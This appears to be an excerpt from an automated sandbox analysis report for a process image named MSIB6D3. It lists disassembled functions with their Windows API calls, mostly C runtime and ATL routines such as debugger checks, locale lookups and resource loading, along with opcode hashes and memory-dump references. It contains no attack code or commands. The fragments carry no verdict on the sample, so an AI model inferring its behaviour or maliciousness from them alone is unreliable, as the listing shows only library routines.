                                                                                    • Instruction ID: 7785dc791ffdc42d3c0a7463eb082bfeefe0cbfdf752af5e0920e392f89a11a6
                                                                                    • Opcode Fuzzy Hash: db3d6b4a069956a04b9ccb9a78f56c3b17d34ac2319487544c0418d681c76f1d
                                                                                    • Instruction Fuzzy Hash: 74516D75A00215AFEB20DFA5CC45ABE77F8FF58700F1441A9A924EB190EB78DD44CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 3213747228-0
                                                                                    • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                    • Instruction ID: ea445cf43f3696fd7899aa76efad42ec695e80aa4b7fd93cfe3d1d0023187354
                                                                                    • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                    • Instruction Fuzzy Hash: 80B155729046459FDF25CF68C8D1BEEBBE5EF59300F1481EAE905AB241D2399E11CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B533B4
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B53480
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B534A0
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00B534AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 64103bdc66f2d9a65bdc17a074d57e7700270d384cdadcaf9bd68ec594df0c04
                                                                                    • Instruction ID: 8b01c088540f23269b830b07763148ddfaa9796bb017b421b17e6f73990c4dea
                                                                                    • Opcode Fuzzy Hash: 64103bdc66f2d9a65bdc17a074d57e7700270d384cdadcaf9bd68ec594df0c04
                                                                                    • Instruction Fuzzy Hash: 3D314875D4521C9BDB10DFA0D989BCDBBF8AF08705F1040EAE90CAB250EB719B898F44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B3C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,5D8D6CBB,?,00B73D30,000000FF), ref: 00B3C657
                                                                                      • Part of subcall function 00B3C630: GetLastError.KERNEL32(?,00000000,00000000,5D8D6CBB,?,00B73D30,000000FF), ref: 00B3C661
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,00B88AF0), ref: 00B3D0D8
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B88AF0), ref: 00B3D0E7
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B3D0E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 3511171328-631824599
                                                                                    • Opcode ID: 83ee337b766f8bfd9e66ad3e93d7ccfe28fa7e5244b7efad490b323286db4e87
                                                                                    • Instruction ID: 636caa5e1d5e0d57a0dacf70a36cc26929bc6bda20affbd5d01419a196cc73c6
                                                                                    • Opcode Fuzzy Hash: 83ee337b766f8bfd9e66ad3e93d7ccfe28fa7e5244b7efad490b323286db4e87
                                                                                    • Instruction Fuzzy Hash: 15E092702047418FD324AF38E818B427BE4AF11700F2088ECE4A9D36A1EFB0D488CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B6E28B
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B6E2D5
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B6E39B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 661929714-0
                                                                                    • Opcode ID: bbafc604de483d157a85e4478c69dd1ff94091bf692cc6df4e53995ef0516c28
                                                                                    • Instruction ID: 80f493e25a77c6dd399b96ce5a4865315595748dd94b4e8a94d5752280942433
                                                                                    • Opcode Fuzzy Hash: bbafc604de483d157a85e4478c69dd1ff94091bf692cc6df4e53995ef0516c28
                                                                                    • Instruction Fuzzy Hash: DB618C759402079FEB299F28CC82BBA77E8EF18301F1041F9E925D7285EB78D995CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B56F13
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B56F1D
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B56F2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: b6102c13ce754c2f24b0465ca108a59086a709ddd16a4b999a94791708b282c9
                                                                                    • Instruction ID: e505d7a8c0e17150cf8211b3727d0450a965e5d8482e8a665bf1f0b587241dde
                                                                                    • Opcode Fuzzy Hash: b6102c13ce754c2f24b0465ca108a59086a709ddd16a4b999a94791708b282c9
                                                                                    • Instruction Fuzzy Hash: F731A5749012189BCB21DF64D9897CDBBF8BF18311F5041EAE91CA7250EB709F858F44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadResource.KERNEL32(00000000,00000000,5D8D6CBB,00000001,00000000,?,00000000,00B74460,000000FF,?,00B3474D,00B33778,?,00000000,00000000,?), ref: 00B345DB
                                                                                    • LockResource.KERNEL32(00000000,?,00000000,00B74460,000000FF,?,00B3474D,00B33778,?,00000000,00000000,?,?,?,?,00B33778), ref: 00B345E6
                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00B74460,000000FF,?,00B3474D,00B33778,?,00000000,00000000,?,?,?), ref: 00B345F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$LoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 2853612939-0
                                                                                    • Opcode ID: 868bfce65099636aa2a40181777b4f31b8b674ae5d0430916f47adcb09e7ccb9
                                                                                    • Instruction ID: 3c30ffebcbb44b7b39a16bb4933ea822060630501595014a409e99e1beb94813
                                                                                    • Opcode Fuzzy Hash: 868bfce65099636aa2a40181777b4f31b8b674ae5d0430916f47adcb09e7ccb9
                                                                                    • Instruction Fuzzy Hash: B8110632A046549BC7368F59DC45B66B7FCE786715F1005AAEC1AC3250EF35AC00C690
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                    • Instruction ID: 3de6f829b2414cc460f623275fd44c646eb2639838b1b818efc9520dd5f574d7
                                                                                    • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                    • Instruction Fuzzy Hash: E4F11D71E002199FDF18CF68D9806ADB7F1EF98315F1582A9E925AB381D730AE05CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B67F64,00000000,00000000,00000000), ref: 00B67E23
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationTimeZone
                                                                                    • String ID:
                                                                                    • API String ID: 565725191-0
                                                                                    • Opcode ID: d6f06653b3509c3ca42937ef54209dd695a80661bda3dd1280353a8277c700b7
                                                                                    • Instruction ID: 3088b1430200b0e084a094c4a55d44b914353c0dd5917bca386ab3522684ebd8
                                                                                    • Opcode Fuzzy Hash: d6f06653b3509c3ca42937ef54209dd695a80661bda3dd1280353a8277c700b7
                                                                                    • Instruction Fuzzy Hash: DCC10672944215ABDB20AB64DC02ABE77F9EF14758F6441E6F901EB291FF389E40C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B684B8,?,?,00000008,?,?,00B714E4,00000000), ref: 00B686EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 5dd9201292754f8084018f3581a705b5b34f6eeb3ace8a85d3ad0c52eb103dbc
                                                                                    • Instruction ID: d2ee22c2bf9f9c67b653db5870d9f49ed59f9aefe3d19dd00be27fb222c14431
                                                                                    • Opcode Fuzzy Hash: 5dd9201292754f8084018f3581a705b5b34f6eeb3ace8a85d3ad0c52eb103dbc
                                                                                    • Instruction Fuzzy Hash: C8B14B31610608DFDB15CF28C48AB657BE1FF45364F258698E99ACF2A1CB39ED91CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B535BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: d77d19641ce6f5a0c6221317050a42f52c586652018ac5233736c9eab5ce54b4
                                                                                    • Instruction ID: 7884198386f1a16b9b33274cc14b8434e34f26a74cd9b67b79459193a967afaa
                                                                                    • Opcode Fuzzy Hash: d77d19641ce6f5a0c6221317050a42f52c586652018ac5233736c9eab5ce54b4
                                                                                    • Instruction Fuzzy Hash: 6B51A2B1E04205DBDB15CF98E881BA9BBF0FB08785F2484AAC805EB360D7749E44CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: baf322b97fe25c3f754133bfb6d4537827e38575b3a28a51fa46eac57b488046
                                                                                    • Instruction ID: d661b9064d3c69edd93659f87c2f10bb4c56749d13c9474ed7d277c2ec0bedfe
                                                                                    • Opcode Fuzzy Hash: baf322b97fe25c3f754133bfb6d4537827e38575b3a28a51fa46eac57b488046
                                                                                    • Instruction Fuzzy Hash: C031B572900219AFCB20EFA9CCC5DBBBBBDEB85350F144199F915D7244EA35EE408B60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 74282a56461893d5b62a8d503fff2b2c612d9b2db59e2bd289e87865ef1307bc
                                                                                    • Instruction ID: fea3e3e429629e8e7d8b4b99bee59be29427c070cd3cd64092ad0bbb1898e070
                                                                                    • Opcode Fuzzy Hash: 74282a56461893d5b62a8d503fff2b2c612d9b2db59e2bd289e87865ef1307bc
                                                                                    • Instruction Fuzzy Hash: 90C1AC749006468FCB29CE28C490B7ABBF1FB59312F2847D9DC56B7291D730AD4ACB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B6E4DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    • Opcode ID: 76fea7aa2601d233277bccd7d87c43515c0e0149c5ad3b07b243c65955c7651e
                                                                                    • Instruction ID: 4d453232bf81a6d2df0b52b18434af88499535f52df6e82e37524177f1bad742
                                                                                    • Opcode Fuzzy Hash: 76fea7aa2601d233277bccd7d87c43515c0e0149c5ad3b07b243c65955c7651e
                                                                                    • Instruction Fuzzy Hash: 4021B076644206ABDB289F24DC42ABA73E8EF54318F1000FAFD16D6141FB78ED05CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • EnumSystemLocalesW.KERNEL32(00B6E237,00000001,00000000,?,-00000050,?,00B6E868,00000000,?,?,?,00000055,?), ref: 00B6E183
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 4b1adcafc17eb6d77afc5de73c4a715d46c791f51258a2bea381c14e7fdb9bd7
                                                                                    • Instruction ID: 452a31d46aa8b0daf39f7bec99adcba48a639b09bc51d9abb561ea24edc1b9ca
                                                                                    • Opcode Fuzzy Hash: 4b1adcafc17eb6d77afc5de73c4a715d46c791f51258a2bea381c14e7fdb9bd7
                                                                                    • Instruction Fuzzy Hash: A211253F2007019FDB189F38C8A19BAB7D2FF80729B19442CE95697A40D775B942DB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B6E453,00000000,00000000,?), ref: 00B6E6E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    • Opcode ID: d36ce207415ded0c5cb048c834143d9c0f1c6074bbc4018416c40dee5dfca1a8
                                                                                    • Instruction ID: a155b8e90f972554dce0134c9677134134010ccd08d0a4977ecafc45247c11cf
                                                                                    • Opcode Fuzzy Hash: d36ce207415ded0c5cb048c834143d9c0f1c6074bbc4018416c40dee5dfca1a8
                                                                                    • Instruction Fuzzy Hash: E3F0A93A600212BFDB285A648C49BBA77D8FB40754F1504A4EC25A3180EA78FD41C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • EnumSystemLocalesW.KERNEL32(00B6E48A,00000001,?,?,-00000050,?,00B6E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B6E1F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 444b30ac4c32fe1807314b92be084cb2a9e897e9854db37170374a1e04c2e940
                                                                                    • Instruction ID: 6890214f6e21cc7a6ae623991209d624fb386d0134d81c66e8403eb762632a45
                                                                                    • Opcode Fuzzy Hash: 444b30ac4c32fe1807314b92be084cb2a9e897e9854db37170374a1e04c2e940
                                                                                    • Instruction Fuzzy Hash: 63F0463A2003045FCB245F358C85A7A7BD5EF81728F0444ACF9158BA80C6B9EC42DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B61C9A: EnterCriticalSection.KERNEL32(-00B8DE50,?,00B63576,?,00B8A078,0000000C,00B63841,?), ref: 00B61CA9
                                                                                    • EnumSystemLocalesW.KERNEL32(00B67125,00000001,00B8A1D8,0000000C,00B67554,00000000), ref: 00B6716A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 0cb54bff894f1cb14e82de04ebb5a74651f4db88f6cc4239e2114932663ee066
                                                                                    • Instruction ID: 5a1a7b0eb4c123f931a70ddd91aadc53373acad3660f087a2868d1010d8fc907
                                                                                    • Opcode Fuzzy Hash: 0cb54bff894f1cb14e82de04ebb5a74651f4db88f6cc4239e2114932663ee066
